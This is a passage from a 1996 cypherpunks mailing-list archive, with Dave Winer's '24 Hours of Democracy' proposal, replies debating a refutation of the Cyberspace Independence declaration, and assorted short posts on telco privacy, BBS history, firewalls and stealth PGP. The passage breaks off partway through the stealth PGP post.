  Here's an idea that I'm floating.

  Check it out.

  What do you think?

  Can you help?

  Thanks!

  ***The net has been redefined

  On 2/8/96 cyberspace was redefined by the US government.

  If you doubt me, visit <http://www.whitehouse.gov/>. Click on the
  calendar icon next to What's New. Check out their coverage of the
  Telecom Act, their celebration of 24 Hours in Cyberspace. I think
  this trip should be required reading for every freedom-loving
  webmaster, webwriter and web user.

  The first huge blast of cyberpsace puffery and a historic rejection
  of the US Constitution, on the same day.

  A coincidence? An accident of history? Hmmmm.

  I was educated as a mathematician and then as an engineer.

  I've spent 20+ years debugging software.

  I've learned that when I want to really understand what's going on,
  don't look to an Act of God as the explanation, when it's more likely
  just an error in logic.

  The truth: the media people have learned how to use the net and to
  combine it with TV, radio and print media.

  They're transferring the power structures in their world to the web
  world.

  If we want real change, now is the time to make an investment in
  democracy on the Internet.

  Every voice can be heard. Our ideas speak for us. We can persuade,
  cajole, taunt, seduce, use logic, examine all aspects of a problem,
  learn, be angry, be scared, and then find the most eloquent
  statement, the one that resonates deepest within all of us.

  And then we march.

  It's an exciting time to be a webwriter!

  I get to write about the biggest issue of them all -- freedom.

  And, please read on -- you do too.

  ***It's our turn

  Another truth: the media people liked the blackout campaign. It
  worked. The day after 24 Hours in Cyberspace, the big news on TV was the
  blackout. It demos well. It was an appropriate protest. Good job!

  Now, let's go the next step.

  Here's my proposal.

  Wednesday.

  Start time: 12:01AM, Pacific, 2/14/96.

  End time: 11:59PM, Pacific, 2/14/96.

  24 Hours of Democracy.

  They defined cyberspace.

  We define democracy.

  ***Write an essay

  What does freedom mean to you?

  What does democracy mean to you?

  What are your hopes and dreams for the Internet?

  Have you ever experienced grace or nobility on the net?

  Do you have children? Are you a child? What do you think?

  How does the Internet help make things right?

  Be angry! That's cool. And be respectful. It's Valentine's Day!

  Write a love letter to the Internet.

  ***How it works

  Spend a couple of days writing your essay.

  Talk about it with your friends. Share ideas. Listen.

  When you're ready, post your essay to the web. If you don't have a
  website, check out the Sponsors page at the 24 Hours website. I'm
  enlisting the help of service providers. We may have an easy way for
  people who don't have sites to get their essays posted to the web.

  Shortly after the start time I'll mail a DaveNet piece telling you
  where to send the URL for your page.

  The styling of the page is entirely up to you. There's a Template page
  on the 24 Hours site, the URL is at the bottom of this email. I suggest
  using a white background for easy reading, and to contrast the black
  backgrounds of last week. Use animated GIFs. RealAudio. Java
  applets. Shockwave parts. JavaScript banners. Near the bottom of
  the page, put some keywords about yourself, where you are
  geographically, your email address. Web crawlers will be able to
  extract this information and index it. Follow the example in the
  template if possible.

  At the top of your page, create three links, Next, Prev and Index.
  After the 24 Hours database is compiled, a few days after the end time,
  we'll send you a mail message containing the addresses to fill into
  each of these pointers. Next and Prev will point to essays written by
  other 24 Hours participants. The Index link will point to a home page
  for the whole project.

  Essays will not be judged or reviewed. You own your own words, and are
  responsible for what you write.

  ***Who can help

  Moms & Dads: Ask your kids how they feel about the Internet. Have they
  made new friends? What have they learned? Did the Internet ever scare
  them? Make some quiet time. Listen.

  Teachers: This would make a great homework assignment for your
  students.

  Webmasters: You have to seduce people into caring about this stuff.
  Convey your excitement to people you work with. It's not just about
  pornography, it's about freedom. Point them to "Netscape"'s home
  page. Ask them to read your essay. Create a page of pointers to their
  essays.

  Computer users: Be a visionary! What kind of software would you like
  to see coming from the software industry over the next few years?

  Graphic artists: We need colorful schemes, a simple message, low
  bandwidth art with commercial appeal.

  Celebrities, political leaders: Do you have something to say?

  Editorial organizations: Can you review essays and choose the most
  compelling ones or the most interesting ones?

  Online companies: We need mail, web and database servers; search
  engines. Can you make it easier for your users to get a single page up on
  your server? Can you assist them in registering their pages on
  Wednesday? Can you give them a discount, or provide free storage for
  their essays? Bandwidth, support and free service to participants
  is what counts.

  Everyone: Have fun! That's what this is about. Be creative. As soon as
  it stops being fun we stop growing, and that's the end. Be positive!

  ***Only 42 hours left

  That's about it.

  I've committed the next few weeks to making this happen.

  I want to work with people, where possible, but by design it's a very
  distributed Internet sort of thing.

  I plan to write my own 24 Hours essay, and have lots of ideas for the
  sponsors.

  There are only 42 hours till the essays start rolling in.

  Let's have fun!

  Dave Winer

  PS: People have said there's not enough time. I think there is. I've
  been getting lots of long emails from people in response to the
  DaveNet pieces I've been running. We'll get something done on
  2/14/96 and then if it works, we'll do it again in a few weeks.

  PPS: Please watch <http://www.hotwired.com/userland/24/> for
  project and sponsorship news and other information.

  PPPS: Remember, if you want to participate the legal system, it's
  *very* important that if you're old enough, that you vote. Think
  about who you can support. 1996 is an election year in the US. Be part of
  the system. If you're a voter, please vote!

  PPPPS: Please pass this essay on! The 24 Hours project is worldwide.
  It's open to everyone, of all nationalities.

---------------------------------------------------------------
It's your turn to speak: <http://www.hotwired.com/userland/24/>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 13 Feb 1996 15:21:15 +0800
To: cypherpunks@toad.com
Subject: Re:A Cyberspace Independence Refutation
Message-ID: <2.2.32.19960212202324.006e8ee8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


strata@virtual.net wrote:

>Let us show them how cunning, baffling, and powerful we can be as
>armed federal marshals walk into a major ISP and shut down their
>routers, as replays of Operation Sun Devil occur in people's houses,

Operation Sun Devil happened in 1990.  A couple of BBS' were shut down.  It
hasn't been repeated much since.  There are currently more than 7,000
commercial ISPs in the world.  At one or two shutdowns per decade, it will
take a while.  Note too that an ISP is more like a carrier (common or not)
than like a publisher.  Legal difficulties for the Feds.  Even harder in the
future when 100 million households worldwide have full-time net access
running on real multitasking workstations.

>as major idiocy of the sort that only a scared government in a country
>which considers itself free can carry out.

>digress. All the little-boy fantasies of the Powerful Internet don't
>mean two beans when an officially sanctioned thug turns the switch
>from 1 to 0 on your POP. It'll happen. Just watch.

I'm waiting.  Then I'll have to call all the way to Montreal to log on.
They will have a lot of fun trying to *find* all the ISPs though.  There are
quite a few and that still leaves company, academic, government, and private
TCP/IP servers up.

>Oh, let's start right off pretending that 
>a) the net is an independently funded entity with no government
>infrastructure and

There's not much government infrastructure left on the Net.  The backbone
went private the weekend after the OKC Federal building was blown up.

>While we're at it, let's press a monkey-brain hot button in any person
>of political power by saying their power does/should not apply here.
>This will not only make them receptive to the reasoning which we will
>lay out in the rest of the document, it will impress them with our
>real-world suavity, tact, and general with-it-ness.

Defeat is a process that occurs in the mind of the enemy.  If you can
convince them not to fight, you and they are better off.  In any case, you
don't get anywhere by failing to assert your strength.  A declaration of
independence doesn't mean you are independent it is the opening shot in a
conflict by which you win (prove) your independence.

>Nature abhors a vacuum. I assume it surprises no one that much of the
>major flack about the net began when it became widely known to
>government that the net considered itself anarchic.

It doesn't consider itself anarchic -- it is.  The IETF reaches decisions by
consensus and the software that becomes part of what we call "the Net"
becomes a part of the Net only when a large enough number of individual
servers decide to run it.

>We took a defense department network and ran with it, but since we've
>been playing with it for over a decade, it's ours now. Just like when
>the neighbor kid loaned us his toy and we fixed it up, painted it, put
>new wheels on it, and now he wants it back! WAAAAAAHHHH!

Neither Arpanet nor the Internet were Defense Department networks.  They
were (for a while) academic networks funded (in part) by DOD and many other
sources.  Certainly when the Internet went international (when exactly did
that happen?)  the DOD became an insignificant player.

>network culture. You did not again and again provide equipment and
>resources only to watch them become privatized by the core of
>sysadmins and techies that you paid over the years, often in outright
>blackmail ("we'll walk away unless you sell/give us the equipment and
>facility"). 

These sorts of informal negotiations of the terms of employment are quite
common in life.  Anyone could have been fired at anytime if their
supervisors didn't like what they were doing.  It is blackmail to threaten
to quit only if you are a slave who is not "allowed" to do so.  Here, we can
quit a job any time for any (or no) reason.  Certainly employers both public
and private have benefitted from the development of networking technology.

>Like use of copyrighted material, for instance. We who forward things
>from the "experimental" (but going for years) AP and NYT news wire
>feeds, the Dave Barry mailing lists, the Calvin and Hobbes cartoon
>daily web sites, we will identify them and address them by our means
>if we ever decide there's a problem there that we actually care about.

Fair use (private distribution) or published on the net by the copyright
holders themselves.

>Same with snuff stories about real people

You mean like novels about the Kennedy assassination.

>harrassment of women, minorities, or homo/bi/trans-sexuals online, etc.

Well *somebody* has to do it.  Women, minorities and the differently sexed
certainly harass other people.  I thought we all had equal rights.

>Online advertising actually bothers us, so we completely smite and try to 
>drive out of business people who are clueless enough to try spamming.

This obviously hasn't worked.  There's an awful lot of advertizing on the
net these days.

>Right, only by ISP and spelling and punctuation ability. This
>paragraph is where I decided I finally had to come out and call
>bullshit to this whole thing. And how many of the people on the mailing lists
>that claim to be full of internet liberators, free-speech advocates,
>people who are "building cyberspace" etc look at something posted by,
>say, an AOL account, with the same level of fair judgement as they do

<Various complaints about net elitist misbehavior elided.>

When one goes out into the marketplace, one encounters many different people
and many challenges.  You must win acceptance from some of the other
participants you find there.  There are mores.  You have to learn some of
them or find others of your ilk who already share you mores.  It is not
hard.  It is called life. 

>I'm rolling on the floor, but I'm not sure if I'm laughing or crying.
>WHAT PLANET ARE YOU FROM? Can someone take an anonymous poll of the
>Known Network and ask the following: "I routinely refrain from
>posting my opinions or beliefs to mailing lists and/or newsgroups for
>fear of flaming, harrassment, or ridicule, even when I am confident of 
>those beliefs or opinions (strongly-disagree disagree no-opinion agree
>strongly-agree)" 

I've never been bothered.  Tim has had the cops called on him.  We still
post at will.  A short survey of the Feed suggests that many other people
continue to post at will.  Probably too many.  In fact, they obviously feel
freer to do so on the net than in real life.

>Hell, look what the cypherpunk community did to Detweiler! I've never
>met the man, but I've read his papers and he doesn't seem like a total
>nut case to me. 

Opinions differ.

>does that mean we have to handle them with a complete
>lack of compassion? Do we have to be little boys with sticks
>tormenting a wounded animal? I don't think so.

This is not a therapy group.  Compassion is a personal matter.  Certainly LD
is not noted for his compassion.

>it. For that matter, source code copyrights on the net are just a
>quaint custom, and so are people's personal privacy expectations with
>regard to their email and to their files. I mean,
>electronic privacy isn't a concept of property, identity, or
>expression is it? What's all this fuss about crypto? Silly people,
>those legal concepts don't apply here!!! Now go read your users mail
>like a good sysadmin and turn in heretics to the thought police. Mr.
>Barlow says it's okay, right here in this widely-forwarded document!

I hadn't noticed much advocacy of reading private email or turning people in
to the thought police anywhere on the Net.  Perhaps you read some unusual
mailing lists.

>Now I understand why there is no fear of the plug being pulled-- so
>what if this message is being read on a physical screen and is stored
>on a physical disk, with a physical junction joining it to the network,
>"there is no matter here". The fact that the computer on which you
>read this may belong to someone else, may be shut down without your
>control, may be being misused according to their intent just by
>transmitting this message, that is irrelevant! OMMMMMMM-- are you
>receiving this message? OMMMMMMMM....

In modern capitalist societies like the US, it is possible to actually own
fairly powerful computers yourself.  In fact, I understand that even the
peasantry in America can put together the $200 for a used 386sx and the $39
for a 14.4K modem and run a free copy of Linux and have a powerful TCP/IP
server of their own.  The dialup connection is not permanent of course.  It
can be bought from many local, national, and overseas providers.  Encrypted
TCP/IP to out-country ISPs will make things a bit harder to track.

>The persons we have kicked off numerous online services, such as
>Cantor & Seigel, email harrassers, stalkers, etc are not really "us",
>so this statement is entirely self-consistent, Selah.

Severing a contractual relationship with someone (under the terms of that
contract) is not physical coercion and bears no resemblance to physical
coercion.  Those who are "disfellowshipped" by lists or ISPs can find others
who will accept them.

>Even if we don't apply it universally to ourselves, only to those
>online bodiless entities who meet with our approval and are clearly
>also members of the intellectual and anarchic elite!

Actually, the ability to control group inclusion and exclusion is the
definition of one sort of a society.  You are arguing that the Net has
become a grouping of various societies and subcultures.  I agree.

>Yes, I should give up my political career and
>the hope of building new housing in my district, getting more school
>funding, etc for a bunch of twenty (or thirty)-something
>non-constitutents who think of me as a pustulent gastropod. I'll run
>right out and vote against TRA!!

We (some of we) don't want the housing or the school funding either.  I
certainly consider slave schools to be the most common form of child abuse
in the world today.

>How much do you go out of your way for people who openly despise you
>and publicly declare your stupidity with every other breath?

Don't go out of your way.  Just stay out of our way.  Play golf instead.  

>Tsk tsk-- how will people find you after your domain name gets taken
>out of the InterNIC servers and your ISP is forced to pull your
>network number or get shut down? Or rather, how will other people
>besides your group of fellow net.elite peers find you?

Use another domain name.  Internic doesn't even have a monopoly of domain
name assignment within the US.  If it casually screws around with too many
people, it will guarantee further loss in market share.  How, exactly, is
there going to be a massive pulling of IP addresses.  That sounds like an
awful lot of expensive litigation to me.  Court orders don't come cheap even
if the Feds do buy them wholesale.  They'll lose that predator hunt energy
balance equation as long as it costs me virtually nothing so set up a new
net presence somewhere else but it costs them $thousands per "takedown."

>We've got a hell of a lot of work to do, then. Let's start by not
>flaming people at the drop of a hat. Perhaps I myself am guilty of
>this-- everyone who flames thinks they have a good enough reason.
>But unlike some people, I've never claimed to be a superior being.

In this century alone, the governments of the world have murdered more than
160 million people.  The Net has very few murders to its (dis)credit.  If
flaming is the worst we ever do...

>Declaration are a major red herring. Every person who takes his or
>her five minutes to forward this to another mailing list or to his or
>her congresscritter is wasting time and helping to promote an
>impression of the net as a place full of immature, unrealistic people.

I've found JPB to be reasonably realistic for one "of the left."  This
debate is *about* who is the most "realistic" the regulators or the
anti-regulators.  So far, the regulators haven't done too well.  Time will
tell.  In any case, it's way too early to declare the game over.  As for
"realism."  One may be permitted to doubt the realism of those who expect
massive physical raids to shut down the net.  That sort of thing worked (for
a while) in commie countries but it's never even been tried here.  If they
are going to do it, they'd better do it soon before the net triples in size
again.  

>Find something original and concrete to do instead. Spend the five 
>minutes writing and *mailing* an original letter to your elected
>official and mention you are in his or her district. 

This is *original*?

>Write a
>non-judgemental, helpful explanation of something to a net newcomer.
>Install PGP on your roomate's machine and teach him/her how to use
>it. Take an hour to write and post a refutation to a meme which 
>you think will harm the net community. Just go DO something.

This happens to be how Barlow spends most of this time.  Many of us as well.

>It's a hard thing to face, that armed persons might come to your door
>and shut down your livelihood and your main access to your chosen
>community of friends, and possibly shoot you or your loved ones in 
>the process. 

Now there's a *real* breach of netiquette.  Remind me not to give my real
address to my ISP.  Too bad their prisons are sort of maxed out with drug
dealers or they might lock up the lot of us (though one wonders on what
charges).

>The sooner we face and deal with that fear in ourselves,
>and use that transformative power to direct our actions for individual
>and collective freedom, the better. 

I thought that that was what you were objecting to.

>Pretending we are ruling a
>powerful invisible empire which is immune to violence is not the way
>to get there. Get real about the virtual.

Not an empire an anarchy and not ruling it either.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Tue, 13 Feb 1996 15:10:18 +0800
To: cypherpunks@toad.com
Subject: fwd: Meeks on telcos sharing local call info
Message-ID: <v02120d00ad45517ea0ee@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>This is forwarded from:
>
>Date: Tue, 6 Feb 1996 20:17:43 -0800
>From: "Brock N. Meeks" <brock@well.com>
>To: cwd-l@cyberwerks.com
>Subject: CWD--We're Not in Kansas Anymore Sender: owner-cwd-l@cyberwerks.com
>
>CyberWire Dispatch // Copyright (c) 1996 //
>
>Jacking in from the "Abandon All Hope" Port:
>
>Washington, DC --
>Howard Stern's Private Parts
>==========================
>
>Although Howard Stern's privacy (is this an oxymoron?) isn't in question
>here, your privacy is.
>
>The bill basically allows the telephone companies to use the data they have
>on you in any way they see fit, with one caveat: They must provide the same
>access to that information to competitors, if asked. As long as they don't
>hog all your private data, such as how many times
>you call Domino's Pizza or whether you're an avid QVC network shopper, they
>can sell your data to just about anyone and use it internal in ways that
>should make your skin crawl.
>
>This is all laid out in admittedly banal Congress speak: "A local exchange
>carrier (that's your local phone company) may use, disclose, or permit
>access to aggregate customer information... only if it provides such
>aggregate information to other carriers or persons on reasonable and
>nondiscriminatory terms and conditions up reasonable request therefore."
>
>In other words, bend over and kiss your sweet aggregate good-bye.
>
>Meeks out...
>--- end forwarded text






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: otto@cc.jyu.fi (Otto J. Makela)
Date: Mon, 12 Feb 1996 22:42:54 +0800
To: cypherpunks@toad.com
Subject: ShowView?
Message-ID: <OTTO.96Feb12153902@tukki.jyu.fi>
MIME-Version: 1.0
Content-Type: text/plain


I was told by someone on the list that ShowView (the GemStar-made European
equivalent of VCR+) had been cracked.  Unfortunately, he didn't remember
any details, and I couldn't find anything with the standard ftp/www search
tools.  Pointers, anyone?
-- 
   /* * * Otto J. Makela  <otto@cc.jyu.fi> * * * * * * * * * * * * * * * * */
  /* Phone: +358 41 613 847, BBS: +358 41 211 562 (V.32bis/USR-HST,24h/d) */
 /* Mail: Cygn.k.7 E 46/FIN-40100 Jyvaskyla/Finland, ICBM: 62.14N 25.44E */
/* * * Computers Rule 01001111 01001011 * * * * * * * * * * * * * * * * */




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Tue, 13 Feb 1996 10:29:39 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: LI Newsday OpEd: Criminal Justice System
In-Reply-To: <199602121616.LAA18717@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960212155940.26287A-100000@amanda>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 12 Feb 1996, Perry E. Metzger wrote:

> 
> "Deranged Mutant" writes:
> > Found a really good op-ed piece in LI Newsday, Thurs. Feb 8, pA53
> > by Robert Reno, "If Jails Are Full, How Much Tougher Can Judges Get?"
> 
> I personally find stuff like this interesting, but I prefer read about
> it in places like libernet or the like. Cypherpunks is for
> cryptography.


I personally like reviews of messages that are posted regarding other 
people's posts, however I prefer to read them in email.  Cypherpunks 
isn't for "this doesn't belong here" messages. :)

==========================================================================
 + ^ + |  Ray Arachelian |Emptiness is loneliness, and loneliness|  _ |>
  \|/  |sunder@dorsai.org|is cleanliness  and cleanliness is god-|  \ |
<--+-->|                 |liness and god is empty,  just like me,|   \|
  /|\  |    Just Say     |intoxicated  with the maddness,  I'm in|   <|\
 + v + | "No" to the NSA!|love with my sadness.   (Pumpkins/Zero)|   <| n
===================http://www.dorsai.org/~sunder/=========================


[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996] 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Date: Tue, 13 Feb 1996 13:27:20 +0800
To: cypherpunks@toad.com
Subject: To find the clock speed of a sun workstation
Message-ID: <199602130016.AA10339@sunstorm.corp.cirrus.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi

Is there anyway of finding the clock speed of the CPU on a Sun workstation?
As far as i know it can be found only by rebooting the machine and using
module-info? And I believe that the module-info does a no-op loop for a
a known number of times and calculates the time taken.

I would like to know if there is anyother way to finding it.

Thanks!

Ashfaq




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Tue, 13 Feb 1996 20:31:55 +0800
To: cypherpunks@toad.com
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <9602122233.AA04770@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain




> Well, that's the way the net is *now* - but it wasn't always
> so.  I 
 remember the days when the net was composed of a
> *lot* of point-to-point 
 UUCP connections eventually
> winding up at the backbone.
> 


Don't forget FIDONet.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strata@virtual.net
Date: Tue, 13 Feb 1996 14:11:07 +0800
To: lmccarth@cs.umass.edu
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <CMM.0.90.2.824172470.strata@virtual-city.virtual.net>
MIME-Version: 1.0
Content-Type: text/plain



Oh, hey, no problem.

You're not the only one, despite the explicit reference in the document.
Whether I like it or not, this industry is largely centered around and
run by men.  I always got a kick out of people's assumptions that my
resume and my writing must "naturally" belong to a guy.  Apparently
the dominant paradigm thinks I'm holding my own in the rat race.

I learned to take it as a compliment years ago; the same thing
happened in 3 out of 5 phone screenings for job interviews.  
What's really been entertaining is where we did email prescreening and
I showed up for an interview and got to watch someone's mental
transmission popping its syncromesh for a moment.  <grin>  They always
recover quickly and continue the shift into "interview mode", and I
get that nice warm glow of having broadened someone's horizons. 

Cheers,
_Strata





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Decius <decius@montag33.residence.gatech.edu>
Date: Tue, 13 Feb 1996 20:35:24 +0800
To: erc@dal1820.computek.net (Ed Carp)
Subject: Re: A Cyberspace Independence Refutation
In-Reply-To: <Pine.3.89.9602120919.A6693-0100000@dal1820.computek.net>
Message-ID: <199602122202.RAA26619@montag33.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text


> > 	And there is essentially no possibility of practical alternative
> > communications facilities becoming available - aside from the titanic
> > capital costs of creating such, most of the resources required such as
> > radio spectrum, orbital slots and rights of way are tightly controlled by
> > the entrenched corperations that operate the present facilities. 
>
> Well, that's the way the net is *now* - but it wasn't always so.  I 
> remember the days when the net was composed of a *lot* of point-to-point 
> UUCP connections eventually winding up at the backbone.  People could be 
> many hops away from the backbone and still have email and news access.  
>
VERY true. People who are getting on the net now assume it is a corporate 
medium created by government grants... but the INTERNET is not nearly the
extent of decentralized communications. Man, when I was in high-school 
NOBODY had legit internet access. If you wanted to reach out and touch 
systems on the other side of the planet you had to BREAK INTO a network 
to do it. Thats one of the most important reasons that hackers "cracked" 
into systems. It was an incredible rush to be able to use computers that
are on the other side of the globe and run by big corporations. So 
apparently out of reach for an American teenage slacker. We could see 
where this stuff was going, but the discourse wasn't on the net, at least 
for us, it was on BULLETIN BOARD SYSTEMS. Look at FIDOnet. Although a lot 
of FIDOnet sysops are the most anal people in the world, the network 
itself is truely an amazing thing. Any 13 year old kid can set up a 
BBS with a 286 and a cheapo modem. They can join the network and talk to 
people on the other side of the planet. They can't shut it down because 
there IS NO CENTRAL CONTROL AT ALL. Anyone can set up a system for $500 
and people can talk. They can network. The government can never shut down 
every BBS. They cannot possibly be aware of whats out there and noone is 
in control. They cannot stop people from setting up FIDO style networks 
unless they outlaw computers. Maybe not even then. They cannot control 
the free spread of information. Even if you don't like FIDOnet you can 
start your own network. I did. It was called ASKi/Shadownet (later, 
Iniquity Net) and it spread all over the globe. We had people polling for 
mail from Australia! We were just a handful of kids from nashville who 
wanted to talk about computer stuff. We built an international network. 
Anyone can do it and it cannot be stopped. Even if the Internet gets 
overrun by corps and governments, and the WWW becomes the only service, 
the revolution is not over. The web is a transition. Once the Web gets 
all the TV heads on computer networks, they will slowley discover what 
networking REALLY is, what discourse REALLY is, what decentralization 
really is, what freedom of information really is. With BBSs and crypto 
technology, noone can stop the free spread of information. The Christian 
Riech has lost its war before it has even begun.     


-- 
        */^\*  Tom Cross AKA Decius 615 AKA The White Ninja  */^\* 
                    Decius@montag33.residence.gatech.edu

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzA6oXIAAAEEAJ6ZWl7AwF9rDZhREQ2b9aPxJKL7dxQNx6QQ0pB5o9olvNtG
tIjA47KxWmZAx47m2JEWRgAIaiDHx00dEza5GX4FuFHL7wSXW7qOtqj7CmVLEg4e
0F/Mx0z7Q/aNsn34JrZUWbMLKkAOOB9sJARRynPRVNokAS30ampImlrLbQDFAAUT
tCZEZWNpdXMgNmk1IDxkZWNpdXNAbmluamEudGVjaHdvb2Qub3JnPg==
=0qgN
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steven C. Perkins" <sperkins@andromeda.rutgers.edu>
Date: Tue, 13 Feb 1996 10:59:22 +0800
To: cypherpunks@toad.com
Subject: Online Zakat Payment: Religious tithe.
Message-ID: <1.5.4b11.32.19960212220754.009939cc@andromeda.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


Cyber-Anarchists aren't the only ones who can use the Net.

>--- Forwarded message follows ---
>From: zakat@dircon.co.uk (Sohail Mohammed)
>Subject: Online Zakat Payment
>Date: 1 Feb 1996 11:15:34 GMT
>
>Welcome to the Zakat homepage at http://www.ummah.org.uk/zakat/
>which has been setup by the Bait al-Mal al-Islami (BMI).
>
>Bait al-Mal is the public treasury of the Islamic political system (state 
>or nonstate). BMI acts as the finance department function of an Islamic 
>political authority (IPA).  This BMI in the UK operates under the 
>authority of the Muslim Parliament (the IPA in this case).
>
>An IPA may or may not be directly responsible for the management of 
>Mosque(s). The IPA may or may not be directly responsible for relief 
>work. These activities may be carried out indirectly by other agencies 
>operating under the authority of the IPA or supported by it.
>BMI does welfare work in UK and externally.
>
>Zakat collection and distribution is the responsibility of the IPA (which 
>may be a Khalifate or in its absence a regional entity in your part of 
>the world).
>
>Zakat collection and distribution is not a free-enterprise do-it-yourself 
>project. Khalifa AbuBakr (RA) went to war against those people who did 
>not want to pay Zakat to the central authority and who instead wanted to 
>do it 'their-way'.
>
>Any one can setup a registered charitable organization; anyone can't 
>setup a religion or Deen and do it 'their-way'.
>
>The Zakat page is at http://www.ummah.org.uk/zakat/
>
>The online Zakat payment facility is at:
>http://www.ummah.org.uk/zakat/pay.htm
>
>The long term strategy is that we Muslims need a major presence in
>cyberspace. This would include intelligent agents (robots, sheriffs,)
>roaming cyberspace collecting Zakat funds and Jihad funds and doing other
>things we can't yet imagaine. Islamic Gateway http://www.ummah.org.uk
>(and affiliated net entities) is only a primitive foundation for future
>workers to take further. If you want to help realise the dream or want
>free webspace for public service projects contact info@zakat.org.uk
>
>If you are running a BMI function in your part of the world and you wish 
>to co-operate or obtain further information on the UK BMI then contact:
>
>Dr Muhammad Ghayasuddin MMP (*),
>Secretary/Trustee,
>Bait al-Mal al-Islami,
>109 Fulham Palace Road,
>London W6 8JA, UK
>Tel +44 181 563 1995 or 1994 (fax 1993)
>
>WHY is BMI/MP doing this: policy questions to Mohtashim Shaikh MMP, BMI 
>trustee responsible for the online Zakat service at:
>mohtash@ummah.org.uk
>
>Technical questions to the IG chief designer, Brother Ibrahim at:
>query@eurolink.co.uk
>
>(*) MMP = Member of Muslim Parliament
>
>Flames to Mohtashim before Feb 9, afterwards to info@zakat.org.uk
>
>MP as an IPA raises both Zakat funds (using BMI's charitable status in 
>the UK) and also Jihad Funds (NOT using BMI - Jihad is NOT covered as a 
>charitable activity in western law!). Only an IPA can do BOTH Zakat and 
>Jihad fund raising. Let any 'Charity' org try and do that.
>
>Just as a personal aside: a major UK Muslim charity is a part of the 
>Saudi lobby (accountability to Mr Fahd?) whilst another Islamic charity 
>is about to get U.N. affiliation (accountability to Boutrous Boutrous 
>Ghali?). BMI on the other hand is accountable to the Muslim Community and 
>its leadership.
>
>
>
>
*****************************************************************************
Steven C. Perkins                             sperkins@andromeda.rutgers.edu
User Services Coordinator, Rutgers School of Law at Newark
15 Washington Street					 Newark, NJ  07102
VOX: 201-648-5965                                        FAX:  201-648-1356
                 http://www.rutgers.edu/RUSLN/rulnindx.html
                     http://www.rutgers.edu/lawschool.html
"Raise your voices to the Sky. It is a Good Day to die." Chief Crazy Horse
*****************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Tue, 13 Feb 1996 13:43:04 +0800
To: cypherpunks@toad.com
Subject: Re: Firewall USA to Firewall China
In-Reply-To: <v01530500ad454e6a21aa@[206.86.81.52]>
Message-ID: <199602130139.RAA11162@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


> [ Jim Clark, "Firewall China" ]
>
>   A: A lot of people think that's not possible. It's difficult to enforce,
>   but it's certainly possible. A corporation has a so-called fire wall -- a
>   single point of entry into the corporate net. You can have a country
>   that has a single point of entry into its "country net." It's doable. All
>   you need, though, is one breach of security, and there's a leak.
> 
>   A fire wall is a filter -- it filters and doesn't let certain people come in.
>   You can only come in if you have the right permission. So you could
>   easily set that up so that it would filter out your objectionable
>   material.

He seems to be confusing network security with the propagation of content.
A firewall is going to have a lot more trouble filtering dangerous
thoughts than UDP port 1234, unless there are humans in the loop.

Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Tue, 13 Feb 1996 20:32:32 +0800
To: strata@virtual.net
Subject: Re: A Cyberspace Independence Refutation
Message-ID: <199602122246.RAA13172@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


I wrote:
> (I agree with nearly everything in Strata's "Refutation" essay. In 
> particular, I find his comments 
[...]

Someone pointed out to me that I made an incorrect (and worse, unsupported)
assumption about Strata's gender there. I'm sorry.

-Lewis




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Wed, 14 Feb 1996 17:15:37 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Stealth PGP work
In-Reply-To: <199602081217.HAA20652@opine.cs.umass.edu>
Message-ID: <Pine.LNX.3.91.960212174800.222B-100000@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 8 Feb 1996 lmccarth@cs.umass.edu wrote:

> Is anyone out there actively working on an implementation of the "stealth 
> PGP" concept ?  I asked Derek Atkins about a stealth mode in the upcoming 
> PGP `96 ^H^H^H 3.0 at the Jan. Bay Area physical mtg, and he said the PGP3
> team had no particular plans to support such a thing. 

When asked, he also indicated that the PGP 3.0 message formats would be 
embedded into the API in such a way that it would not be possible to use 
